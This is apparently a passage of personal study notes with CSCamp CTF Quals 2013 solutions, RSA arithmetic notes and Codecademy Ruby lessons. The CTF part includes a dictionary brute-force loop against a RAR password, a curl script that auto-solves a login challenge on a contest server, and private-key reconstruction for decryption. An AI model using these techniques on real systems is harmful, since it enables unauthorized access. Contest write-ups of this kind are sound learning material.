    parser.add_option('-e', dest='e', help='public exponent (default: %d)' % DEFAULT_EXP, type='int', default=DEFAULT_EXP)
    parser.add_option('-o', dest='filename', help='output filname')
    parser.add_option('-f', dest='format', help='output format (DER, PEM) (default: PEM)', type='choice', choices=['DER', 'PEM'], default='PEM')
    parser.add_option('-v', dest='verbose', help='also display CRT-RSA representation', action='store_true', default=False)

    try:
        (options, args) = parser.parse_args()

        if options.p and options.q:
            print 'Using (p, q) to initialise RSA instance\n'
            rsa = RSA(p=options.p, q=options.q, e=options.e)
        elif options.n and options.d:
            print 'Using (n, d) to initialise RSA instance\n'
            rsa = RSA(n=options.n, d=options.d, e=options.e)
        else:
            parser.print_help()
            parser.error('Either (p, q) or (n, d) needs to be specified')

        rsa.dump(options.verbose)

        if options.filename:
            print 'Saving %s as %s' % (options.format, options.filename)


            if options.format == 'PEM':
                data = rsa.to_pem()
            elif options.format == 'DER':
                data = rsa.to_der()

            fp = open(options.filename, 'wb')
            fp.write(data)
            fp.close()

    except optparse.OptionValueError, e:
        parser.print_help()
        parser.error(e.msg)
# ./rsatool.py -p 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489 -q 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917 -n 1230186684530117755130494958384962720772853569595334792197322452151726400507263657518745202199786469389956474942774063845925192557326303453731548268507917026122142913461670429214311602221240479274737794080665351419597459856902143413 -e 65537
Using (p, q) to initialise RSA instance

n =
cad984557c97e039431a226ad727f0c6d43ef3d418469f1b375049b229843ee9f83b1f97738ac274
f5f61f401f21f1913e4b64bb31b55a38d398c0dfed00b1392f0889711c44b359e7976c617fcc734f
06e3e95c26476091b52f462e79413db5

e = 65537 (0x10001)

d =
740de48760442835baad5e1990453a9d16db7976d3f8bb98bf99c0c01cbe9b9c12b808c80683d1e3
46c16c79ac162874f28ca610c1b97e5e1ffae95725ce0c6b031c3e188b17187a793b322cc4004c56
8e76c9b258542ea2a2d6ecd462fff401

p =
d982ec7b440e2869d2535e51f91bacc3eb6eba042e106e6f875c3d17e53db65fffd6e4e9a36084ce
60f83d754dd7f701

q =
eebe6dd23ce7e99c0e2249fecc4418c34af74e418bfa714c3791828414ab18f32fd7e093062a49b0
30225cc845f99ab5

# ipython
: from Crypto.PublicKey import RSA
: keypair = RSA.generate(1024)
: keypair.n = 1230186684530117755130494958384962720772853569595334792197322452151726400507263657518745202199786469389956474942774063845925192557326303453731548268507917026122142913461670429214311602221240479274737794080665351419597459856902143413
: keypair.e = 65537
: keypair.d = 703813872109751212728960868893055483396831478279095442779477323396386489876250832944220079595968592852532432488202250497425262918616760886811596907743384527001944888359578241816763079495533278518938372814827410628647251148091159553
: keypair.p = 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489
: keypair.q = 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917
: private = open('private.pem','w')
: private.write(keypair.exportKey())
: private.close()
: exit
# openssl rsautl -decrypt -in message.enc -out /dev/tty -inkey private.pem
F4ct0r!zaTi0N

# cat RSAcrack.py
#!/usr/bin/python

from sys import*
from string import*

a = argv
[s,p,q] = filter(lambda x:x[:1]!= '-',a)
print "s = " + str(s)
print "p = " + str(p)
print "q = " + str(q)
d='-d' in a
print "d = " + str(d)
e, n = atol(p,16), atol(q,16)
print "e = " + str(e)
print "n = " + str(n)
l = (len(q) + 1) / 2
print "l = " + str(l)
o, inb = l-d, l-1+d
print "o = " + str(o)
print "inb = " + str(inb)
while s:
 s = stdin.read(inb)
 s and map(stdout.write, map(lambda i, b=pow(reduce(lambda x,y : (x<<8L)+y, map(ord,s)), e, n) : chr(b>>8*i&255), range(o-1, -1, -1)))
# cat message.enc | ./RSAcrack.py -d 740de48760442835baad5e1990453a9d16db7976d3f8bb98bf99c0c01cbe9b9c12b808c80683d1e346c16c79ac162874f28ca610c1b97e5e1ffae95725ce0c6b031c3e188b17187a793b322cc4004c568e76c9b258542ea2a2d6ecd462fff401 cad984557c97e039431a226ad727f0c6d43ef3d418469f1b375049b229843ee9f83b1f97738ac274f5f61f401f21f1913e4b64bb31b55a38d398c0dfed00b1392f0889711c44b359e7976c617fcc734f06e3e95c26476091b52f462e79413db5 | strings
F4ct0r!zaTi0N

# CSCamp CTF Quals 2k13: Steganography - Stego 3


Sam says "I love you, no really."
Mike says "Hot steamy grits!"
Mike says "Hot steamy grits!"
Mike says "No."
Sam says "Get off my colon"
Harold says "Who said OJ?"
Sam says "Who said OJ?"
JYA says "Jason paid me for it."
Harold says "Jason paid me for it."
Kenny says "Jason paid me for it."
Jason says "But I read slash-dot"
Phil says "Well smother me in curry sauce and lick me."
Adam says "Did he mean to die just then?"
Phil says "Mike - you ladyboy!"
Mike says "I said, you've got beautiful eyes."
Andy says "Mine's a pint"
Adam says "I'm so excited"
Adam says "I said, you've got beautiful eyes."
Adam says "So avoid that then!"
Harold says "Did he mean to die just then?"
JYA says "But I read slash-dot"
Phil says "Show me the fish!"
Sam says "Okay, now think of a funny line"
Mike says "Well smother me in curry sauce and lick me."
Adam says "Who said OJ?"
Mike says "Mike - you ladyboy!"
JYA says "Okay, now think of a funny line"
Adam says "Jason paid me for it."
Sam says "I never talk politics."
Mike says "Mmmm ... "
Harold says "Okay, now think of a funny line"
Mike says "Mine's a pint"
JYA says "Mike - you ladyboy!"
Kenny says "Who said OJ?"
Andy says "Alive"
Jason says "I'm so excited"
Kenny says "No."
Kenny says "No."
Andy says "I'd say Thursday"
JYA says "I'll be your private dancer, a dancer for money, I'll do what you want me to do."
Mr Hanky says "Mine's a pint"
JYA says "What does MPEG mean?"
Andy says "Has anyone noticed the plot is straying from ... well reason, really... "
JYA says "Mike - you ladyboy!"
Mike says "Mike - you ladyboy!"
Mike says "I said, you've got beautiful eyes."
Jason says "Has anyone noticed the plot is straying from ... well reason, really... "
Mr Hanky says "What does MPEG mean?"
Sam says "I'll be your private dancer, a dancer for money, I'll do what you want me to do."
Harold says "Who said OJ?"
Mike says "I'd say Thursday"
Sam says "So avoid that then!"
Harold says "What does MPEG mean?"
Mike says "Hot steamy grits!"
Kenny says "Did he mean to die just then?"
Kenny says "Well smother me in curry sauce and lick me."
Harold says "Did he mean to die just then?"
Adam says "But I read slash-dot"
Phil says "So avoid that then!"
Sam says "Mine's a pint"
Andy says "So avoid that then!"
end of scene

# wget --quiet http://web.archive.org/web/20100826055053/http://www.scramdisk.clara.net/play/playmaker.zip
# # Use playmaker to get the URL
# wget --quiet http://www.mediafire.com/download/5fppbkaujddijuk/bruteme.rar
# while read line; do result=`unrar x bruteme.rar -p$line 2> /dev/null | grep OK`; if [ "$result" != "" ]; then echo "Password = '$line'"; break; fi; done < dic.txt && cat Flag.txt
Password = 'asap'
The Flag is {fb7df6e9ea6a5eb47263734fc158aceb}

# CSCamp CTF Quals 2k13: Forensics - Forensics 1 (200 points)


# cat dataNov-8-2013.sql
DROP TABLE `myTable`;

CREATE TABLE `myTable` (
  `id` mediumint(8) unsigned NOT NULL auto_increment,
  `name` varchar(255) default NULL,
  `password` varchar(255),
  `permission` mediumint default NULL,
  `score` varchar(100) default NULL,
  PRIMARY KEY (`id`)
) AUTO_INCREMENT=1;

INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Riley Holman","4BA964803B710605F6F7BBFF2CE81BF6",421,"77.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Maxine Austin","DE8E13534B39BA8354247F3F1EF85A82",428,"19.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Aretha Ball","A46E8222DCB12F466396586DD05F9604",436,"71.37");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Iliana Combs","4956611731BA8F4F4C52A67A0EA4917D",433,"18.58");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sacha Evans","1F69275D041F9E5C8B43C2D0CF8A95FB",415,"23.13");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Gabriel Floyd","7DA5DF7C8615FD929CFA8F339924E896",416,"15.65");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Cole Pierce","223FB9108E9A85A2E9622F57DD0324F5",421,"70.29");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Carolyn Evans","2B5234CEC28F0253448C25D6816D782A",414,"90.68");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Jelani Rodgers","8B867BE7B0CF51723DFA50038852DDF5",428,"83.10");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Josephine Ratliff","02A7EB4D15539223833CBB2E9FDE85A9",426,"3.45");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ginger Brooks","71653BA64D976CA38656F54EE9981F99",401,"53.71");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Yuri Suarez","3B8AF637C01F98508A479E010FA90A73",418,"18.35");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ainsley Stone","562C32E3C78C0317CF7D0789731A918F",425,"35.04");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Molly Powell","BDAE91761A79770577E1F129B32ABD67",436,"32.12");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Alyssa Gregory","52CB473DFBE43624547FFB29700EB040",410,"22.62");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("August Rodgers","78057B4CFAE303BF262CD2CCDD0E01A8",433,"0.75");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Neville Todd","272E6DDAD05D3BFF92C5FA6EB7932424",436,"23.56");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Evan Cohen","120C001D3DD3700C0A2E5A79CBB07039",410,"59.59");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Deborah Garner","346184FCBFC7F7ADD557113284517A7A",447,"99.64");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Steel Richmond","72B3DA05A80855DD6F0874E9C8077E3E",402,"78.22");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Vielka Chambers","E9334B3C18AEF9F8136A0FB76AA5B989",412,"32.31");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Oleg Sherman","871589F79961AA75A701EBC466C0A8E2",448,"15.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Wyatt Humphrey","796E2F53AFBF930B1B762D237A1AA112",433,"65.41");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kay Benson","D86025C1F02A1E270FA47552F6311B2E",413,"77.40");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lacy West","6EC8DCB8E9A69A0E26446B78C3AA73AE",408,"29.38");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Hiram Hurst","02280B275C73EE7342ACFE7A6B44DBCE",444,"81.44");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Thaddeus Higgins","F996F6E35CA80D3DD14770CBE77C6635",401,"39.35");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Randall Pearson","F29286D07B348490C9D87503B66063C6",420,"72.95");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Grace Mckenzie","EB7F2337B70C4AAC1FC5B2CC9F805D94",431,"29.35");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Aurora Davis","C4640E4D2E7E07B52D1E7167641BE2EB",422,"12.14");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Geraldine Watts","743462B522085EA36BAD2EEDD1C8827F",421,"38.31");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Norman Durham","DEF31249723B8F56245F16C9FF1F5C33",435,"63.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Colorado Hess","C6A5DD9969ECB22B498E87F8DCB07F73",417,"37.14");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Cade Mcintyre","3F3C6CA38D531EBF73FF0BB13B870A03",434,"71.96");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Dillon Yang","10A498AC98890B90B5CD8750700BB5BC",419,"89.23");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Haley Branch","FEBB74414FA5BF1888E80F9BAE774D93",435,"51.42");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Finn Woods","2934E3E3EE577D5FD5890708BD1F86FB",400,"47.24");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Craig York","E6E25D7D443428CC84C00A1F28FE83E7",432,"73.24");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Rudyard Mejia","FA1DF603880504104B24EA3C37AA1741",408,"90.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Grace Todd","1CE546597AB7E7A254628DC2F4707DE9",429,"12.74");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sasha Velez","E448BE33DADF0262A4FD3453B225BF49",413,"47.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kieran Bryant","F753400403B3EF3C37173399F9D9E6BD",443,"45.67");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Alfreda Beach","20161525318F501C456D40AEE19CE9D0",433,"62.25");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Vernon Joyce","C4917BA71B8EFE4D358149A074D8EC0B",402,"65.50");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Maryam Sandoval","867F728527AFAF7B30648A219F150C28",407,"57.94");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lila Lindsey","AC1FE8AD294ED542DF4E930E4C0CEA58",419,"42.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ifeoma Larsen","4F211C6FAB4C9417D58B94C626BBC231",403,"80.25");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Hermione Craig","2292D579EBA69FE5821E58A15C56DBA0",446,"8.18");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("David Crane","B9A586FFFFD480676E183EDAB94C78F3",406,"91.12");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Mercedes Lott","A089077408B7E996D7483DC055097A21",437,"18.61");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Melodie Patton","C2212ACA95303B5BE38E9DE249455F11",406,"52.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Denise Cardenas","4FEF84297DF3C2BBB89EC332824948B9",423,"63.72");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Martha Livingston","0EB9689A5B506DA5AD8D5B1FF9B90521",413,"88.61");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sarah Owen","B645BFAB686B33309F28FC38D9AED798",445,"73.31");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Selma Simon","9C8530BE4F25827013490D4EAB83A503",408,"75.45");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kylan Mcfadden","5954E473C9BDBE24FF8EA46DECE2F7C5",403,"13.68");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Avram Miranda","F5132BE06D2BC14BC8297E7ADF6307DF",442,"8.17");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Wanda Chambers","FB002E2DA3160A89271C50380A508428",400,"12.05");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Courtney Le","21AFCE12ECB8E29B8AE0B96B2BDAB12D",410,"83.37");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Shay Short","FCF2ABE3A0D5974A2E1D0CBA8DD60B30",424,"63.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Chanda Clarke","2E05813EBA25D06B137CC4A25565D980",423,"29.56");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Leroy Haney","FB9D640C103D264E2985EDB4B4DBC61C",406,"7.14");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Nadine Michael","8FA40B7DDE2B1C36B12FD7D834A065AF",415,"41.12");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Drew Donaldson","5FB3DA68B2C2DE5DBDA41EF155B4AF7F",449,"15.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Daniel Crane","CE95AB2D9026CF010F1146D80C00C438",408,"67.83");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ross Stuart","C80920C8DC9EC9FED6B668764BADE7BB",401,"78.26");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Octavius Gamble","2C1B9D48AD88BE425C9C146E3E9EE531",405,"43.60");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Fredericka Rice","B303DEC6AAAC075C8A37D21C06F185E3",426,"71.67");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Vance Huff","5D3C7E74FFAB75FF210F27F4F422C1A2",446,"45.38");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Shaine Ward","6C6AB557DA6CD8DCA4BF3016C20F0EE7",432,"69.75");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ezekiel Bush","5A7C8125EB2A6665A66038129F00952E",401,"3.46");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lewis Nguyen","8ADD9803F69410A13335C26CCCFAD855",410,"31.50");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Catherine Daniel","CB30AAAEBA9DDC0383A5F74A4DFA02DD",443,"16.57");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Barry Shepherd","8B7772040D5358EB85F2AD14D32B1389",449,"82.82");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Adrienne Benton","621B2E06494F1AF44C58A9A5BEE5EE64",403,"50.67");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Jillian Alston","3609AAEAC8A0C7652008BE60C5616E1A",415,"52.98");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Chanda Dickson","FD2A9A4A7C0CE0C6CADC723991B36E76",437,"56.76");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lara Benson","535FA2060136DE4A56DFFFB369AD53EA",422,"0.21");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Deborah Moreno","16A86BBD8913F80F80AB7354982306D1",440,"70.72");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Keaton Navarro","3360C02FFA0F219D8C3D5C09C67E3087",413,"97.27");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Wanda Justice","0F90F41E6374B479A49400BE4B7B0630",419,"5.66");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sacha Briggs","513386AC2F4B995D9598A5055686C582",423,"33.26");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Nevada Gordon","F10C3F1F9A46490C35D9B3210893F58F",420,"28.47");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Leilani Rivas","A9E928D9D79ABF74AB6CCF6FEB8E21AC",434,"98.00");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kylie Green","D136FAF95F0AAB1770E7F9FDC189B1E8",411,"10.19");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Brian Welch","2CFC1ECC98D00DE7D87B484E46CD9ECC",435,"11.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Orson Livingston","DA593D64D4251BCC040E86B50A1C5D52",426,"3.11");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Mikayla Ratliff","C820573A8E75FB5D3C99D3BA99FB1A7D",408,"38.26");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Mechelle Stout","8113A0AFF55D9262FAD9378E8365514E",409,"49.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Gay Buck","D5CC5123B49E33CC7356B8C1EE5D1AEE",402,"77.25");

# names=$(while read line; do hex=`echo "$line" | xxd -p | tr -d '\n'`; if [ "`echo $hex | grep 0d`" != "" ]; then echo "`grep -A 1 "$line" dataNov-8-2013.sql | tail -n 1 | awk -F '"' '{print $2}'`"; fi; done < dataNov-8-2013.sql | tr '\n' ',')
# echo -n ${names:0:-1} | md5sum
71284b9edd33e4141952b325a9c6acda

# CSCamp CTF Quals 2k13: Web - Robots


# cat robots
#!/bin/bash

name=`curl --silent --cookie-jar botmania --cookie botmania 'http://176.9.193.6/challenges_x/final/wbb_x2/' | grep 'text" name' | awk -F '"' '{print $4}'`
solution=`grep challenge botmania | awk '{print $NF}' | tr '+' ' ' | sed -e 's/%2A/*/' -e 's/%2B/+/' -e 's/%2D/-/' -e 's/%2F/\//' | bc -l`
#--proxy 127.0.0.1:8080
curl --silent --cookie-jar botmania --cookie botmania --request POST --data "$name=$solution&submit=Login" 'http://176.9.193.6/challenges_x/final/wbb_x2/'

# CSCamp CTF Quals 2k13: Crypto - Predictor


can you predict the next number in the sequence?

[51751041,236753494,190402293,48644501,297659248,230684862,7697029,173742959,126005793]

The code used to create those numbers is

import random
i = 295075153L
x = random.randint(0, i)
y = random.randint(0, i)
for j in range (1,10):
x = (2*x + 5) % i
y = (3*y + 7) % i
print (x^y)

The flag will be the next number in the sequence

# cat predictor.py
#!/usr/bin/python

import random 

i = 295075153

def sequence(x,y):
 for j in range (1,11):
  x = (2*x + 5) % i
  y = (3*y + 7) % i
  print (x^y)

y = 0
while True:
 y1 = (3*y + 7) % i
 x1 = y1^51751041
 x2 = (2*x1 + 5) % i
 y2 = (3*y1 + 7) % i
 if x2^y2 == 236753494:
  print "y = " + str(y)
  x = 0
  '''
  while True:
   if x1 == (2*x + 5) % i:
    print "x = " + str(x)
    sequence(x,y)
    exit()
   x += 1
  '''
  x = (i + x1 - 5) / 2
  print "x = " + str(x)
  sequence(x,y)
  exit()
 y += 1
# ./predictor.py
y = 173565935
x = 268355495
51751041
236753494
190402293
48644501
297659248
230684862
7697029
173742959
126005793
103605566

# RSA operation


Key generation

p # prime number
q # prime number
n # modulus
n = p * q

totien(n) = (p - 1) * (q - 1)

e # public key exponent
1 < e < totien(n) and gcd(e, n) = 1

d # private key exponent

# Method 1
d =  gmpy.invert(e, totien(n))

# Method 2
def egcd(a, b):
 if a == 0:
  return (b, 0, 1)
 else:
  g, y, x = egcd(b % a, a)
  return (g, x - (b // a) * y, y)

def modinv(a, m):
 g, x, y = egcd(a, m)
 if g != 1:
  return None  # modular inverse does not exist
 else:
  return x % m

d = modinv(e, totien(n))

# Method 3
d = 1
while True:
 if (e * d - 1) % totien_n == 0:
  print d
  break
 else:
  d += 1

(e, n) # public key
(d, n) # private key

Example

p = 61
q = 53
n = 53 * 61 = 3233
totien(3233) = (53 - 1) * (61 - 1) = 3120
e = 17
d = modinv(e, totien(3233)) = 2753

(17, 3233) # public key
(2753, 3233) # private key

m = 65 # message
c # ciphertext

Encryption

c = m**e % n = pow(m, e, n)
c = 65**17 % 3233 = pow(65, 17, 3233) = 2790

Decryption

m = c**d % n = pow(c, d, n)
m = 2790**2753 % 3233 = pow (2790, 2753, 3233) = 65

# CRT (to speed up calculation)
dp = d % (p - 1) = 2753 % (61 - 1) = 53
dq = d % (q - 1) = 2753 % (53 - 1) = 49
qinv = modinv(q, p) = modinv(53, 61) = 38
m1 = c**dp % p = 2790**53 % 61 = 4
m2 = c**dq % q = 2790**49 % 53 = 12
h = (qinv * (m1 - m2)) % p = (38 * (4 - 12)) % 61 = 1
m = m2 + (h * q) = 12 + (1 * 53)= 65

References

https://en.wikipedia.org/wiki/RSA_(cryptosystem)
https://en.wikipedia.org/wiki/Chinese_remainder_theorem
https://factordb.com

# Codecademy: Ruby


1. Introduction to Ruby

my_num = 25
my_boolean = true
my_string = "Ruby"

3+3
3-3
3*3
3/3
3**3
3%3

puts "What's up" # newline
print "Montalvo"

"I love espresso".length
"Eric".reverse
puts "eric".upcase
puts "ERIC".downcase
puts "Eric".downcase.reverse.upcase

=begin
I'm a comment!
I don't need any # symbols.
=end

print "What's your first name?"
first_name = gets.chomp
first_name.capitalize!
puts "Your name is #{first_name}"
2. Control Flow in Ruby

x = 1
y = 2
if x < y
  puts "x is less than y!"
elsif x > y
  puts "x is greater than y!"
else
  puts "x equals y!"
end

hungry = false
unless hungry
  puts "I'm writing Ruby programs!"
else
  puts "Time to eat!"
end

is_true = 2 != 3
is_false = 2 == 3
test_1 = 17 > 16
test_2 = 21 < 30
test_3 = 9 >= 9
test_4 = -11 <= 4

true && true # => true
false || false # => false
!true # => false
(3 < 4 || false) && (false || true)
3. Looping with Ruby

counter = 1
while counter < 11
  puts counter
  counter += 1
end

counter = 1
until counter > 11
  puts counter
  counter += 1
end

for num in 1...10 # 1-9
  puts num
end

for num in 1..10 # 1-10
  puts num
end

i = 20
loop do
  i -= 1
  next if i % 2 != 0
  print "#{i}"
  break if i <= 0
end

my_array = [1,2,3,4,5]

array = [1,2,3,4,5]
array.each do |x|
  x += 10
  print "#{x}"
end

odds = [1,3,5,7,9]
odds.each do |n|
  print n*2
end

10.times { print "Chunky bacon!" }
4. Arrays and Hashes

demo_array = [100, 200, 300, 400, 500]
print demo_array[2]

multi_d_array = [[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]
multi_d_array.each { |x| puts "#{x}\n" }

my_hash = {
  "name" => "Eric",
  "age" => 26,
  "hungry?" => true
}
puts my_hash["name"]
puts my_hash["age"]
puts my_hash["hungry?"]

pets = Hash.new
pets["Stevie"] = "cat"
pets["John"] = "dog"
pets.each { |x, y| puts "#{x}: #{y}" }
5. Blocks and Sorting

def puts_1_to_10
  (1..10).each { |i| puts i }
end
puts_1_to_10

def cubertino(n)
  puts n ** 3
end
cubertino(8)

def what_up(greeting, *bros)
  bros.each { |bro| puts "#{greeting}, #{bro}!" }
end
what_up("What up", "Justin", "Ben", "Kevin Sorbo")

my_array = [3, 4, 8, 7, 1, 6, 5, 9, 2]
my_array.sort!

book_1 = "A Wrinkle in Time"
book_2 = "A Brief History of Time"
c = book_1 <=> book_2 # -1 (>), 0 (=), 1 (<)
6. Hashes and Symbols

symbol_hash = {
  :symbol1 => 1, # symbol1: 1,
  :symbol2 => 2, # symbol2: 2,
  :symbol3 => 3  # symbol3: 3
}

strings = ["HTML", "CSS", "JavaScript", "Python", "Ruby"]
symbols = Array.new
strings.each do |string|
    symbols.push(string.to_sym) # or string.intern
end

movie_ratings = {
  memento: 1,
  primer: 2,
  the_matrix: 3,
}
good_movies = movie_ratings.select { |m, r| r > 2 }
movie_ratings.each_key { |k| puts k }
movie_ratings.each_value { |v| puts v }
7. Refactoring

ruby_is_eloquent = true
ruby_is_ugly = false
puts "Ruby is eloquent!" if ruby_is_eloquent
puts "Ruby's not ugly!" unless ruby_is_ugly

puts 1>0 ? "True" : "False" # Ternary conditional expression

case greeting
  when "English" then puts "Hello!"
  when "French"  then puts "Bonjour!"
  when "German"  then puts "Guten Tag!"
  when "Finnish" then puts "Haloo!"
  else puts "I don't know that language!"
end

favorite_book = nil
favorite_book ||= "Guide to Ruby" # set
favorite_book ||= "Guide to Perl" # not set

def add(a,b)
  return a + b # a + b (without return)
end

"L".upto("P") { |l| puts l }

age = 26
age.respond_to?(:next) # true (27)

alphabet = ["a", "b", "c"]
alphabet << "d" # alphabet.push("d")
caption = "A giraffe surrounded by "
caption << "weezards!" # caption += "weezards!"

age = 26
I am " + age.to_s + " years old."
I am " << age.to_s << " years old."
I am #{age} years old."
8. Blocks, Procs, and Lambdas

fibs = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]
doubled_fibs = fibs.collect { |f| f*2 }

def double(p)
  yield p
end
double(1){ |x| x*2 }

floats = [1.2, 3.45, 0.91, 7.727, 11.42, 482.911]
round_down = Proc.new { |x| x.floor }
ints = floats.collect(&round_down)

hi = Proc.new { puts "Hello!" }
hi.call

numbers_array = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
strings_array = numbers_array.collect(&:to_s)

strings = ["leonardo", "donatello", "raphael", "michaelangelo"]
symbolize = lambda { |s| s.to_sym }
symbols = strings.collect(&symbolize)
9. Object-Oriented Programming, Part I

class Person
  def initialize(name)
    @name = name
  end
end
me = Person.new("Eric")

class MyClass
  $my_variable = "Hello!" # global var
end
puts $my_variable

class Person
  @@people_count = 0 # class variable
  def initialize(name,age,profession)
    @name = name # instance var
    @age = age
    @profession = profession
  end
end

class ApplicationError
  def display_error
    puts "Error! Error!"
  end
end
class SuperBadError < ApplicationError # inheritance
  def display_error # override
    puts "SuperError! SuperError!"
    super # call parent method
  end
end
err = SuperBadError.new
err.display_error
10. Object-Oriented Programming, Part II

class Dog
  def initialize(name,breed)
    @name = name
    @breed = breed
  end
  public
  def bark
    puts "Woof!"
  end
  private
  def id
    @id_number = 12345
  end
end

module Circle
  PI = 3.141592653589793
  def Circle.area(radius)
    PI * radius**2
  end
  def Circle.circumference(radius)
    2 * PI * radius
  end
end

